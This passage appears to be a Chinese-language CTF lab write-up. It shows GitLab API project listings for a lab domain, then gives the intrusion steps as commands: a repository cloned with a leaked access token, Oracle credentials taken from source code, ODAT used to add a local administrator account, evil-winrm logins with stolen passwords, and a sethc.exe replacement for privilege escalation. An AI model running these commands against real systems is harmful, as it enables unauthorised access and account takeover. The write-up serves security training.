"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 2,
"description": "Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook",
"name": "XRWiki",
"name_with_namespace": "XRLAB / XRWiki",
"path": "xrwiki",
"path_with_namespace": "xrlab/xrwiki",
"created_at": "2022-12-25T07:44:18.589Z",
"default_branch": "master",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xrwiki.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xrwiki.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md",
"avatar_url": "http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png",
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:44:18.589Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/2",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/2/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/2/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/2/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/2/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/2/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/2/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/2/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": null,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:44:18.627Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": false,
"jobs_enabled": true,
"snippets_enabled": false,
"container_registry_enabled": false,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "disabled",
"builds_access_level": "enabled",
"snippets_access_level": "disabled",
"pages_access_level": "public",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "disabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": false,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 1,
"description": "This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).",
"name": "Monitoring",
"name_with_namespace": "GitLab Instance / Monitoring",
"path": "Monitoring",
"path_with_namespace": "gitlab-instance-23352f48/Monitoring",
"created_at": "2022-12-25T07:18:20.914Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git",
"web_url": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring",
"readme_url": null,
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:18:20.914Z",
"namespace": {
"id": 2,
"name": "GitLab Instance",
"path": "gitlab-instance-23352f48",
"kind": "group",
"full_path": "gitlab-instance-23352f48",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/1",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/1/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/1/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/1/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/1/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/1/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/1/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/1/cluster_agents"
},
"packages_enabled": true,
"empty_repo": true,
"archived": false,
"visibility": "internal",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:18:21.108Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 1,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": null
}
}
]一共是 6 个项目
- gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git
- gitlab.xiaorang.lab:xrlab/xrwiki.git
- gitlab.xiaorang.lab:xrlab/awenode.git
- gitlab.xiaorang.lab:xrlab/xradmin.git
- gitlab.xiaorang.lab:xrlab/internal-secret.git
使用 proxychains git clone 下来
# username:password@url/namespace/project
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git下载到源码后直接搜索 Oracle IP
url: jdbc:oracle:thin:@172.22.14.31:1521/orcl
username: xradmin
password: fcMyE8t9E4XdsKf使用 ODAT 执行 Shell 命令
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user chy 123!@#qwe /add'
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators chy /add'登陆 RDP 拿到 flag02
再回到刚才的项目 internal-secret 中
下载下来发现是个密码表,对应机器名 172.22.14.46 XIAORANG\XR-0923
使用账户密码 zhangshuai:wSbEajHzZs 登陆 RDP
发现没有权限访问 Administrator 文件夹,需要提权
查看当前权限
whoami
whoami /priv
使用工具[evil-winrm](https: //github.com/Hackplayers/evil-winrm)攻击
账户属于 Remote Desktop Users 和 Remote Management Users 组, 因此可以 evil-winrm 上去
proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs再次查看权限,成功获得 SeRestorePrivilege 权限
因为有 SeRestorePrivilege,所以能无视 ACL 修改文件或者编辑注册表
把 cmd.exe 重命名为 sethc.exe,然后在锁屏界面连按五次 shift 启动 sethc 提权
Flag
flag01: flag{6b648281-2dbb-4c20-bdbb-dff05fbd95fd}
flag02: flag{b61abb8b-08c3-45b4-a9ba-e39f1e90a87e}
flag03: flag{515d2cee-ff20-44ea-b28a-b3981£36b2cb} Powered by Waline v3.3.1